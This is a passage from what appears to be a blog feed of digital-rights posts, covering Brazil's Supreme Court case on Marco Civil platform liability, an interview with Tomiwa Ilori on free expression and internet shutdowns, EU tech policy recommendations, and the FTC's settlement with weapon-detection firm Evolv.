the third one comes from a prior rule included in the Brazilian child protection law. \nThe decision the court takes will set a precedent for lower courts regarding two main topics:\u00a0whether Marco Civil\u2019s internet intermediary liability regime is aligned with Brazil's Constitution\u00a0and whether internet application providers have the obligation to monitor\u00a0online content they host and remove it when deemed\u00a0offensive, without judicial intervention. Moreover, it can have a regional and cross-regional impact as lawmakers and courts look across borders at platform regulation trends amid global coordination initiatives. \nAfter a public hearing held last year, the Court's sessions about the cases started in late November and, so far, only Justice Dias Toffoli, who is in charge of Marco Civil\u2019s constitutionality case, has concluded the presentation of his vote. The justice declared Article 19 unconstitutional and established the notice-and-takedown regime set in Article 21 of Marco Civil, which relates to unauthorized disclosure of private images, as the general rule for intermediary liability. According to his vote, the determination of liability must consider the activities the internet application provider\u00a0has actually carried out and the degree of interference of these activities. \nHowever, platforms could be held liable for certain content regardless of notification, leading to a monitoring duty. Examples include content\u00a0considered criminal offenses, such as\u00a0crimes\u00a0against the democratic state, human trafficking, terrorism, racism, and violence against children and women. It also includes the publication of notoriously false or severely miscontextualized facts that lead to violence or have the potential to disrupt the electoral process. If there\u2019s reasonable doubt, the notice-and-takedown rule under Marco Civil\u2019s Article 21 would be the applicable regime. \nThe court session resumes today, but it\u2019s still uncertain whether all eleven justices will reach a judgement by year\u2019s end. \u00a0 \nSome Background About Marco Civil\u2019s Intermediary Liability Regime \nThe legislative intent back in 2014 to establish Article 19 as the general rule for internet application providers' liability for user-generated content reflected civil society\u2019s concerns over platform censorship. Faced with the risk of being held liable for user content, internet platforms generally prioritize their economic interests and security over preserving\u00a0users\u2019 protected expression and over-remove content to avoid legal battles and regulatory scrutiny. The enforcement overreach of copyright rules online was already a problem when the legislative discussion of Marco Civil took place. Lawmakers chose to rely on courts to balance the different rights at stake in removing or keeping user content online. The approval of Marco Civil had wide societal support and was considered a win for advancing users\u2019 rights online. \nThe provision was in line with the Special Rapporteurs for Freedom of Expression from the United Nations and the Inter-American Commission on Human Rights (IACHR). In that regard, the then IACHR\u2019s Special Rapporteur had clearly remarked that a strict liability regime creates strong incentives for private censorship, and would run against the State\u2019s duty to favor an institutional framework that protects and guarantees free expression under the American Convention on Human Rights. Notice-and-takedown regimes as the general rule also raised concerns of over-removal and the weaponization of notification mechanisms to censor protected speech. \nA lot has happened since 2014. Big Tech platforms have consolidated their dominance, the internet ecosystem is more centralized, and algorithmic mediation of content distribution online has intensified, increasingly relying on a corporate surveillance structure. Nonetheless, the concerns Marco Civil reflects remain relevant just as the balance its intermediary liability rule\u00a0has struck persists as a proper way of tackling these concerns. Regarding current challenges, changes to the liability regime suggested in Dias Toffoli's vote will likely reinforce rather than reduce corporate surveillance, Big Tech\u2019s predominance, and digital platforms\u2019 power over online speech. \nThe Cases Under Trial and The Reach of the Supreme Court\u2019s Decision \nThe two individual cases under analysis by the Supreme Court are more than a decade old. Both relate to the right to honor. In the first one, the plaintiff, a high school teacher, sued Google Brasil Internet Ltda to remove an online community created by students to offend her\u00a0on the now defunct Orkut platform. She asked for the deletion of the community and compensation for moral damages, as the platform didn't remove the community after an extrajudicial notification. Google deleted the community following the decision of the lower court, but the judicial dispute about the compensation continued. \nIn the second case, the plaintiff sued Facebook after the company didn\u2019t remove an offensive fake account impersonating her. The lawsuit sought to shut down the fake account, obtain the identification of the account\u2019s IP address, and compensation for moral damages. As Marco Civil had already passed, the judge denied the moral compensation request. Yet, the appeals court found that Facebook could be liable for not removing the fake account after an extrajudicial notification, finding Marco Civil\u2019s intermediary liability regime unconstitutional vis-\u00e0-vis Brazil\u2019s constitutional protection to consumers.\u00a0 \nBoth cases went all the way through the Supreme Court in two separate extraordinary appeals, now examined jointly. For the Supreme Court to analyze extraordinary appeals, it must identify and approve a \u201cgeneral repercussion\u201d issue that unfolds from the individual case. As such, the topics under analysis of the Brazilian Supreme Court in these appeals are not only the individual cases, but also the court\u2019s understanding about the general repercussion issues involved. What the court stipulates in this regard will orient lower courts\u2019 decisions in similar cases.\u00a0 \nThe two general repercussion issues under scrutiny are, then, the constitutionality of Marco Civil\u2019s internet intermediary liability regime and whether internet application providers have the obligation to monitor published content and take it down when considered offensive, without judicial intervention.\u00a0 \nThere\u2019s a lot at stake for users\u2019 rights online in the outcomes of these cases.\u00a0 \nThe Many Perils and Pitfalls on the Way \nBrazil\u2019s platform regulation debate has heated up in the last few years. Concerns over the gigantic power of Big Tech platforms, the negative effects of their attention-driven business model, and revelations of plans and actions from the previous presidential administration to remain in power arbitrarily inflamed discussions of regulating Big Tech. As its main vector, draft bill 2630 (PL 2630), didn\u2019t move forward in the Brazilian Congress, the Supreme Court\u2019s pending cases gained traction as the available alternative for introducing changes.\u00a0 \nWe\u2019ve written about\u00a0intermediary liability trends\u00a0around the globe, how to move forward, and the risks that\u00a0changes in\u00a0safe harbors regimes end up reshaping intermediaries\u2019 behavior in ways that ultimately harm freedom of expression and other rights for internet users.\u00a0 \nOne of these risks is relying on strict liability regimes to moderate user expression online. Holding internet application providers liable for user-generated content regardless of a notification means requiring them to put in place systems of content monitoring and filtering with automated takedowns of potential infringing content.\u00a0 \nWhile platforms like Facebook, Instagram, X (ex-Twitter), Tik Tok, and YouTube already use AI tools to moderate and curate the sheer volume of content they receive per minute, the resources they have for doing so are not available for other, smaller internet application providers that host users\u2019 expression. Making automated content monitoring a general obligation will likely intensify the concentration of the online ecosystem in just a handful of large platforms. Strict liability regimes also inhibit or even endanger the existence of less-centralized content moderation models, contributing yet again to entrenching Big Tech\u2019s dominance and business model. \nBut the fact that Big Tech platforms already use AI tools to moderate and restrict content doesn\u2019t mean they do it well. Automated content monitoring is hard at scale and platforms constantly fail at purging content that violates its rules without sweeping up protected content. In addition to historical issues with AI-based detection of copyright infringement that have deeply undermined fair use rules, automated systems often flag and censor crucial information that should stay online. \u00a0 \nJust to give a few examples, during the wave of protests in Chile, internet platforms wrongfully restricted content reporting police's harsh repression of demonstrations, having deemed it violent content. In Brazil, we saw similar concerns when Instagram censored images of Jacarezinho\u2019s community\u2019s massacre in 2021, which was the most lethal police operation in Rio de Janeiro\u2019s history. In other geographies, the quest to restrict extremist content has removed videos documenting human rights violations in conflicts in countries like Syria and Ukraine. \nThese are all examples of content similar to what could fit into Justice Toffoli\u2019s list of speech subject to a strict liability regime. And while this regime shouldn\u2019t apply in cases of reasonable doubt, platform companies won\u2019t likely risk keeping such content up out of concern that a judge decides later that it wasn\u2019t a reasonable doubt situation and orders them to pay damages. \u00a0Digital platforms have, then, a strong incentive to calibrate their AI systems to err on the side of censorship. And depending on how these systems operate, it means a strong incentive for conducting prior censorship potentially affecting protected expression, which defies Article 13 of the American Convention. \u00a0 \nSetting the notice-and-takedown regime as the general rule for an intermediary\u2019s liability also poses risks. While the company has the chance to analyze and decide whether to keep content online, again the incentive is to err on the side of taking it down to avoid\u00a0legal costs. \nBrazil's own experience in courts shows how tricky the issue can be. InternetLab's research based on rulings involving free expression online indicated that Brazilian courts of appeals denied content removal requests in more than 60% of cases. The Brazilian Association of Investigative Journalism (ABRAJI) has also highlighted data showing that at some point in judicial proceedings, judges agreed with content removal requests in around half of the cases, and some were reversed later on. This is especially concerning in honor-related cases. The more influential or powerful the person involved, the higher the chances of arbitrary content removal, flipping the public-interest logic of preserving access to information. We should not forget companies that thrived by offering reputation management services built upon the use of takedown mechanisms to disappear critical content online. \nIt's important to underline that this ruling comes in the absence of digital procedural justice guarantees. While Justice Toffoli\u2019s vote asserts platforms\u2019 duty to provide specific notification channels, preferably electronic, to receive complaints about infringing content, there are no further specifications to avoid the misuse of notification systems. Article 21 of Marco Civil sets that notices must allow the specific identification of the contested content (generally understood as the URL) and elements to verify that the complainant is the person offended. Except for that, there is no further guidance on which details and justifications the notice should contain, and whether the content\u2019s author would have the opportunity, and the proper mechanism, to respond or appeal to the takedown request.\u00a0 \nAs we said before, we should not mix platform accountability with reinforcing digital platforms as points of control over people's online expression and actions. This is a dangerous path considering the power big platforms already have and the increasing intermediation of digital technologies in everything we do. Unfortunately, the Supreme Court seems to be taking a direction that will emphasize such a role and dominant position, creating also additional hurdles for smaller platforms and decentralized models to compete with the current digital giants.\u00a0<\/p><\/div><\/li> The promise of the internet\u2014at least in the early days\u2014was that it would lower the barriers to entry for any number of careers. Traditionally, the spheres of novel writing, culture criticism, and journalism were populated by well-off straight white men, with anyone not meeting one of those criteria being an outlier. Add in giant corporations acting as gatekeepers to those spheres and it was a very homogenous culture. The internet has changed that.\u00a0There is a lot about the internet that needs fixing, but the one thing we should preserve and nurture is the nontraditional paths to success it creates. In this series of interviews, called \u201cGate Crashing,\u201d we look to highlight those people and learn from their examples. In an ideal world, lawmakers will be guided by lived experiences like these when thinking about new internet legislation or policy.\u00a0In our first video, we look at creators who honed their media criticism skills in fandom spaces. Please join Gavia Baker-Whitelaw and Elizabeth Minkel, co-creators of the Rec Center newsletter, in a wide-ranging discussion about how they got started, where it has led them, and what they\u2019ve learned about internet culture and policy along the way.\u00a0\n \n\n \n %3Ciframe%20title%3D%22YouTube%20video%20player%22%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fembed%2FaeplIxvskx8%3Fsi%3DJJtXxSdTkjYiTrTT%26autoplay%3D1%26mute%3D1%22%20width%3D%22560%22%20height%3D%22315%22%20frameborder%3D%220%22%20allowfullscreen%3D%22allowfullscreen%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E\n \n \n Privacy info.\n This embed will serve content from youtube.com<\/p><\/div><\/li> Interviewer: David Greene\n*This interview has been edited for length and clarity.\nTomiwa Ilori is an expert researcher and a policy analyst with focus on digital technologies and human rights. Currently, he is an advisor for the B-Tech Africa Project at UN Human Rights and\u00a0 a Senior ICFP Fellow at HURIDOCS.\u00a0 His postgraduate qualifications include masters and doctorate degrees from the Centre for Human Rights, Faculty of Law, University of Pretoria. All views and opinions expressed in this interview are personal.\u00a0\nGreene: Why don\u2019t you start by introducing yourself?\nTomiwa Ilori: My name is Tomiwa Ilori. I\u2019m a legal consultant with expertise in digital rights and policy. I work with a lot of organizations on digital rights and policy including information rights, business and human rights, platform governance, surveillance studies, data protection and other aspects.\u00a0\nGreene: Can you tell us more about the B-Tech project?\u00a0\nThe B-Tech project is a project by the UN human rights office and the idea behind it is to mainstream the UN Guiding Principles on Business and Human Rights (UNGPs) into the tech sector. The project looks at, for example, how\u00a0 social media platforms can apply human rights due diligence frameworks or processes to their products and services more effectively. We also work on topical issues such as Generative AI and its impacts on human rights. For example, how do the UNGPs apply to Generative AI? What guidance can the UNGPs provide for the regulation of Generative AI and what can actors and policymakers look for when regulating Generative AI and other new and emerging technologies?\u00a0\nGreene: Great. This series is about freedom of expression. So my first question for you is what does freedom of expression mean to you personally?\u00a0\nI think freedom of expression is like oxygen, more or less like the air we breathe. There is nothing about being human that doesn\u2019t involve expression, just like drawing breath. Even beyond just being a right, it\u2019s an intrinsic part of being human. It\u2019s embedded in us from the start. You have this natural urge to want to express yourself right from being an infant. So beyond being a human right, it is something you can almost not do without in every facet of life. Just to put it as simply as possible, that\u2019s what it means to me.\u00a0\nGreene: Is there a single experience or several experiences that shaped your views about freedom of expression?\u00a0\nYes. For context, I\u2019m Nigerian and I also grew up in the Southwestern part of the country where most of the Yor\u00f9b\u00e1 people live. As a Yoruba person and as someone who grew up listening and speaking the Yoruba language, language has a huge influence on me, my philosophy and my ideas. I have a mother who loves to speak in proverbs and mostly in Yor\u00f9b\u00e1. Most of these proverbs which are usually profound show that free speech is the cornerstone of being human, being part of a community, and exercising your right to life and existence. Sharing expression and growing up in that kind of community shaped my worldview about my right to be. Closely attached to my right to be is my right to express myself. More importantly, it also shaped my view about how my right to be does not necessarily interrupt someone else\u2019s right to be. So, yes, my background and how I grew up really shaped me. Then, I was fortunate that I also grew up and furthered my studies. My graduate studies including my doctorate focused on freedom of expression. So I got both the legal and traditional background grounded in free speech studies and practices in unique and diverse ways.\u00a0\nGreene: Can you talk more about whether there is something about \u00a0Yor\u00f9b\u00e1 language or culture that is uniquely supportive of freedom of expression?\u00a0\nThere\u2019s a proverb that goes, \u201cA k\u00ec\u00ed pa oh\u00f9n m\u1ecd agogo l\u1eb9\u0301nu\u201d and what that means in a loose English translation is that you cannot shut the clapperless bell up, it is the bell\u2019s right to speak, to make a sound. So you have no right to stop a bell from doing what it\u2019s meant to do, it suggests that it is everyone\u2019s right to express themselves. It suffices to say that according to that proverb, you have no right to stop people from expressing themselves. There\u2019s another proverb that is a bit similar which is,\u201c\u1eccm\u1ecdd\u00e9 gb\u1ecd\u0301n, \u00e0gb\u00e0 gb\u1ecd\u0301n, laf\u00ed d\u00e1 \u00f3t\u00f9 If\u1eb9\u0300\u201d which when loosely translated refers to how both the old and the young collaborate to make the most of a society by expressing their wisdom.\u00a0\nGreene: Have you ever had a personal experience with censorship?\u00a0\nYes and I will talk about two experiences. First, and this might not fit the technical definition of censorship, but there was a time when I lived in Kampala and I had to pay tax to access the internet which I think is prohibitive for those who are unable to pay it. If people have to make a choice between buying bread to eat and paying a tax to access the internet, especially when one item is an opportunity cost for the other, it makes sense that someone would choose bread over paying that tax. So you could say it\u2019s a way of censoring internet users. When you make access prohibitive through taxation, it is also a way of censoring people. Even though I was able to pay the tax, I could not stop thinking about those who were unable to afford it and for me that is problematic and qualifies as a kind of censorship.\u00a0\nAnother one was actually very recent. Even though the internet service provider insisted that they did not shut down or throttle the internet,, I remember that during the recent protests in Nairobi, Kenya in June of 2024, I experienced an internet shutdown for the first time. According to the internet service provider, the shut down was as a result of an undersea cable cut. Suddenly my emails just stopped working and my Twitter (now X) feed won\u2019t load. The connection appeared to work for a few seconds, and then all of a sudden it would stop, then work for some time, then all of a sudden nothing. I felt incapacitated and helpless. That\u2019s the way I would describe it. I felt like, \u201cWow, I have written, thought, spoken about this so many times and this is it.\u201d For the first time I understood what it means to actually experience an internet shutdown and it\u2019s not just the experience, it\u2019s the helplessness that comes with it too.\u00a0\nGreene: Do you think there is ever a time when the government can justify an internet shutdown?\u00a0\nThe simple answer is no. In my view, those who carry out internet shutdowns, especially state actors, believe that since freedom of expression and some other associated rights are not absolute, they have every right to restrict them without measure. I think what many actors that are involved in internet shutdowns use as justification is a mask for their limited capacity to do the right thing. Actors involved in shutting down the internet say that they usually do not have a choice. For example, they say that hate speech, misinformation, and online violence are being spread online in such a way that it could spill over into offline violence. Some have even gone as far as saying that they\u2019re shutting down the internet because they want to curtail examination fraud. When these are the kind of excuses used by actors, it demonstrates the limited understanding of actors on what international human rights standards prescribe and what can actually be done to address the online harms that are used to justify internet shutdowns.\u00a0\nLet me use an example: international human rights standards provide clear processes for instances where state actors must address online harms or where private actors must address harms to forestall offline violence. The perception is that these standards do not even give room for addressing harms, which is not the case. The process requires that whatever action you take must be legal i.e. be provided clearly in a law, must not be vague, must be unequivocal and show in detail the nature of the right that is limited. Another requirement says that whatever action to be taken to limit a right must be proportional. If you are trying to fight hate speech online, don\u2019t you think it is disproportionate to shut down the entire network just to fight one section of people spreading such speech? Another requirement is that its necessity must be justified i.e. to protect clearly defined public interest or order which must be specific and not the blanket term \u2018national security.\u2019 Additionally international human rights law is clear that these requirements must be cumulative i.e. you can not fulfill the requirement of legality and not fulfill that of proportionality or necessity.\u00a0\nThis shows that when trying to regulate online harms, it needs to be very specific. So, for example, state actors can actually claim that a particular content or speech is causing harm which the state actors must prove according to the requirements above. You can make a request such that just that content alone is restricted. Also these must be put in context. Using hate speech as an example. There\u2019s the RabatAction Plan on Hate Speech which was developed by the UN, and it\u2019s very clear on the conditions that must be met before the speech can be categorized as hate speech. So are these conditions met by state actors before, for example, they ask platforms to remove particular hate content? There are steps and processes involved\u00a0 in the regulation of problematic content, but state actors never go simply for targeted removal that comply with international human rights standards, they usually go for the entire network.\u00a0\nI\u2019d also like to add that I find it problematic and ironic that most state actors who are supposedly champions of digital transformation are also the ones quick to shut down the internet during political events. There is no digital transformation that does not include a free, accessible and interoperable internet. These are some of the challenges and problematic issues that I think we need to address in more detail so we can hear each other better, especially when it comes to regulating online speech and fighting internet shutdowns.\u00a0\nGreene: So shutdowns are then inherently disproportionate and not authorized by law. You talked about the types of speech that might be limited. Can you give us a sense of what types of online speech you think might be appropriately regulated by governments?\u00a0\nFor categories of speech that can be regulated, of course, that includes hate speech. It\u2019s under international law as provided for underArticle 20 of the International Covenant on Civil and Political Rights (ICCPR) prohibits propagation of war, etc. The International Convention on the Elimination of All Forms of Racial Discrimination (ICERD) also provides for this. However, these applicable provisions are not carte blanche for state actors. The major conditions that must be met before avspeech qualifies as hate speech must be fulfilled before it can be regarded as one. This is done in order to address instances where powerful actors define what constitutes hate speech and violate human rights under the guise of combating it. There are still laws that criminalize disaffection against the state which are used to prosecute dissent.\u00a0\nGreene: In Nigeria or in Kenya or just on the continent in general?\u00a0\nYes, there are countries that still have l\u00e8se-majest\u00e9 laws in criminal laws and penal codes. We\u2019ve had countries like Nigeria that were\u00a0 trying to come up with a version of such laws for the online space, but which have been fought down by mostly civil society actors.\u00a0\nSo hate speech does qualify as speech that could be limited, but with caveats. There are several conditions that must be made before speech qualifies as hate speech. There must be context around the speech. For example, what kind of power does the person who makes the speech wield? What is the likelihood of that speech leading to violence? What audience has the speech been made to? These are some of the criteria that must be fulfilled before you say, \u201cokay, this qualifies as hate speech.\u201d\u00a0\nThere\u2019s also other clearly problematic content, child sexual abuse material for example, that are prima facie illegal and must be censored or removed or disallowed. That goes without saying. It\u2019s customary international human rights law especially as it applies to platform governance. Another category of speech could also be non-consensual sharing of intimate images which could qualify as online gender-based violence. So these are some of the categories that could come under regulation by states.\u00a0\nI also must sound a note that there are contexts to applying speech laws. It is also the reason why speech laws are one of the most difficult regulations to come up with because they are usually context-dependent especially when they are to be balanced against international human rights standards. Of course, some of the biggest fears in platform\u00a0 regulation that touch on freedom of expression is how state actors could weaponize those laws to track or to attack dissent and how businesses platform speech mainly for profit.\u00a0\nGreene: Is misinformation something the government should have a role in regulating or is that something that needs to be regulated by the companies or by the speakers? If it\u2019s something we need to worry about, who has a role in regulating it?\u00a0\nState actors have a role. But in my opinion I don\u2019t think it\u2019s regulation. The fact that you have a hammer does not mean that everything must look like a nail. The fact that a state actor has the power to make laws does not mean that it must always make laws on all social problems. I believe non-legal and multi-stakeholder solutions are required for combatting online harms. State actors have tried to do what they do best by coming up with laws that regulate misinformation. But where has that led us? The arrest and harassment of journalists, human rights defenders and activists. So it has really not solved any problems.\u00a0\nWhen your approach is not solving any problems, I think it\u2019s only right to re-evaluate. That\u2019s the reason I said state actors have a role. In my view, state actors need to step back in a sense that you don\u2019t necessarily need to leave the scene, but step back and allow for a more holistic dialogue among stakeholders involved in the information ecosystem. You could achieve a whole lot more through digital literacy and skills than you will with criminalizing misinformation. You can do way more by supporting journalists with fact-checking skills than you will ever achieve by passing overbroad laws that limit access to information. You can do more by working with stakeholders in the information ecosystem like platforms to label problematic content than you will ever by shutting down the internet. These are some of the non-legal methods that could be used to combat misinformation and actually get results. So, state actors have a role, but it is mainly facilitatory in the sense that it should bring stakeholders together to brainstorm on what the contexts are and the kinds of useful solutions that could be applied effectively.\u00a0\nGreene: What do you feel the role of the companies should be?\u00a0\nCompanies also have an important role, one of which is to respect human rights in the course of providing services. What I always say for technology companies is that, if a certain jurisdiction or context is good enough to make money from, it is good enough to pay attention to and respect human rights there.\nOne of the perennial issues that platforms face in addressing online harms is aligning their community standards with international human rights standards. But oftentimes what happens is that corporate-speak is louder than the human rights language in many of these standards.\u00a0\nThat said, some of the practical things that platforms could do is to step out of the corporate talk of, \u201cOh, we\u2019re companies, there\u2019s not much we can do.\u201d There\u2019s a lot they can do. Companies need to get more involved, step into the arena and walk with key state actors, including civil society, to\u00a0 educate and develop capacity on how their\u00a0 platforms actually work. For example, what are the processes involved, for example, in taking down a piece of content? What are the processes involved in getting appeals? What are the processes involved in actually getting redress when a piece of content has been wrongly taken down? What are the ways platforms can accurately\u2014and I say accurately emphatically because I\u2019m not speaking about using automated tools\u2014label content? Platforms also have responsibilities in being totally invested in the contexts they do business in. What are the triggers for misinformation in a particular country? Elections, conflict, protests? These are like early warning sign systems that platforms need to start paying attention to to be able to understand their contexts and be able to address the harms on their platforms better.\u00a0\nGreene: What\u2019s the most pressing free speech issue in the region in which you work?\u00a0\nWell, for me, I think of a few key issues. Number one, which has been going on for the longest time, is the government\u2019s use of laws to stifle free speech. Most of the laws that are used are cybercrime laws, electronic communication laws, and old press codes and criminal codes. They were never justified and they\u2019re still not justified.\u00a0\nA second issue is the privatization of speech by companies regarding the kind of speech that gets promoted or demoted. What are the guidelines on, for example, political advertisements? What are the guidelines on targeted advertisement? How are people\u2019s data curated? What is it like in the algorithm black box? Platforms\u2019 roles on who says what, how,\u00a0 when and where also is a burning free speech issue. And we are moving towards a future where speech is being commodified and privatized. Public media, for example, are now being relegated to the background. Everyone wants to be on social media and I\u2019m not saying that\u2019s a terrible thing, but it gives us a lot to think about, a lot to chew on.\u00a0\nGreene: And finally, who is your free speech hero?\u00a0\nHis name is Fel\u00e1 An\u00edk\u00fal\u00e1p\u00f3 K\u00fat\u00ec. Fela was a political musician and the originator of Afrobeat not afrobeats with an \u201cs\u201d but the original Afrobeat which that one came from. Fela never started out as a political musician, but his music became highly political and highly popular among the people for obvious reasons. His music also became timely because, as a political musician in Nigeria who lived during the brutal military era, it resonated with a lot of people. He was a huge thorn in the flesh of despotic Nigerian and African leaders. So, for me, Fela is my free speech hero. He said quite a lot with his music that many people in his generation would never dare to say because of the political climate at that time. Taking such risks even in the face of brazen violence and even death was remarkable.\nFela was not just a political musician who understood the power of expression. He was also someone who understood the power of visual expression. He\u2019s unique in his own way and expresses himself through music, through his lyrics. He\u2019s someone who has inspired a lot of people including musicians, politicians and a lot of new generation activists.<\/p><\/div><\/li> The European Union (EU) is a hotbed for tech regulation that often has ramifications for users globally. \u00a0The focus of our work in Europe is to ensure that EU tech policy is made responsibly and lives up to its potential to protect users everywhere.\u00a0\nAs the new mandate of the European institution begins \u2013 a period where newly elected policymakers set legislative priorities for the coming years \u2013 EFF today published recommendations for a European tech policy agenda that centers on fundamental rights, empowers users, and fosters fair competition. These principles will guide our work in the EU over the next five years. Building on our previous work and success in the EU, we will continue to advocate for users and work to ensure that technology supports freedom, justice, and innovation for all people of the world.\u00a0\nOur policy recommendations cover social media platform intermediary liability, competition and interoperability, consumer protection, privacy and surveillance, and AI regulation. Here\u2019s a sneak peek:\u00a0\u00a0\n\nThe EU must ensure that the enforcement of platform regulation laws like the Digital Services Act and the European Media Freedom Act are centered on the fundamental rights of users in the EU and beyond.\nThe EU must create conditions of fair digital markets that foster choice innovation and fundamental rights. Achieving this requires enforcing the user-rights centered provisions of the Digital Markets Act, promoting app store freedom, user choice, and interoperability, and countering AI monopolies.\u00a0\nThe EU must adopt a privacy-first approach to fighting online harms like targeted ads and deceptive design and protect children online without reverting to harmful age verification methods that undermine the fundamental rights of all users.\u00a0\nThe EU must protect users\u2019 rights to secure, encrypted, and private communication, protect against surveillance everywhere, stay clear of new data retention mandates, and prioritize the rights-respecting enforcement of the AI Act.\u00a0\n\nRead on for our full set of recommendations.<\/p><\/div><\/li> The Federal Trade Commission has entered a settlement with self-styled \u201cweapon detection\u201d company Evolv, to resolve the FTC\u2019s claim that the company \u201cknowingly\u201d and repeatedly\u201d engaged in \u201cunlawful\u201d acts of misleading claims about their technology. Essentially, Evolv\u2019s technology, which is in schools, subways, and stadiums, does far less than they\u2019ve been claiming.\u00a0\n\nThe FTC alleged in their complaint that despite the lofty claims made by Evolv, the technology is fundamentally no different from a metal detector: \u201cThe company has insisted publicly and repeatedly that Express is a \u2018weapons detection\u2019 system and not a \u2018metal detector.\u2019 This representation is solely a marketing distinction, in that the only things that Express scanners detect are metallic and its alarms can be set off by metallic objects that are not weapons.\u201d A typical contract for Evolv costs tens of thousands of dollars per year\u2014five times the cost of traditional metal detectors. One district in Kentucky spent $17 million to outfit its schools with the software.\u00a0\n\nThe settlement requires notice, to the many schools which use this technology to keep weapons out of classrooms, that they are allowed to cancel their contracts. It also blocks the company from making any representations about their technology\u2019s:\n\n\nability to detect weapons\nability to ignore harmless personal items\nability to detect weapons while ignoring harmless personal items\nability to ignore harmless personal items without requiring visitors to remove any such items from pockets or bags\n\n\nThe company also is prohibited from making statements regarding:\u00a0\n\nWeapons detection accuracy, including in comparison to the use of metal detectors\nFalse alarm rates, including comparisons to the use of metal detectors\nThe speed at which visitors can be screened, as compared to the use of metal detectors\nLabor costs, including comparisons to the use of metal detectors\u00a0\nTesting, or the results of any testing\nAny material aspect of its performance, efficacy, nature, or central characteristics, including, but not limited to, the use of algorithms, artificial intelligence, or other automated systems or tools.\n\n\nIf the company can\u2019t say these things anymore\u2026then what do they even have left to sell?\u00a0\n\nThere\u2019s a reason so many people accuse artificial intelligence of being \u201csnake oil.\u201d Time and again, a company takes public data in order to power \u201cAI\u201d surveillance, only for taxpayers to learn it does no such thing. \u201cJust walk out\u201d stores actually required people watching you on camera to determine what you purchased. Gunshot detection software that relies on a combination of artificial intelligence and human \u201cacoustic experts\u201d to purportedly identify and locate gunshots \u201crarely produces evidence of a gun-related crime.\u201d There\u2019s a lot of well-justified suspicion about what\u2019s really going on within the black box of corporate secrecy in which artificial intelligence so often operates.\u00a0\n\nEven when artificial intelligence used by the government isn\u2019t \u201csnake oil,\u201d it often does more harm than good. AI systems can introduce or exacerbate harmful biases that have massive\u00a0 negative impacts on people\u2019s lives. AI systems have been implicated with falsely accusing people of welfare fraud, increasing racial bias in jail sentencing as well as policing and crime prediction, and falsely identifying people as suspects based on facial recognition.\u00a0\u00a0\u00a0\n\nNow, the politicians, schools, police departments, and private venues have been duped again. This time, by Evolv, a company which purports to sell \u201cweapon detection technology\u201d which they claimed would use AI to scan people entering a stadium, school, or museum and theoretically alert authorities if it recognizes the shape of a weapon on a person.\u00a0\n\nEven before the new FTC action, there was indication that this technology was not an effective solution to weapon-based violence. From July to October, New York City rolled out a trial of Evolv technology in 20 subway systems in an attempt to keep people from bringing weapons on to the transit system. Out of 2,749 scans there were 118 false positives. Twelve knives and no guns were recovered.\u00a0\n\nMake no mistake, false positives are dangerous. Falsely telling officers to expect an armed individual is a recipe for an unarmed person to be injured or even killed.\u00a0\n\nCities, performance venues, schools, and transit systems are understandably eager to do something about violence\u2013but throwing money at the problem by buying unproven technology is not the answer and actually takes away resources and funding from more proven and systematic approaches. We applaud the FTC for standing up to the lucrative security theater technology industry.\u00a0<\/p><\/div><\/li><\/a> <\/span><\/h2><\/div>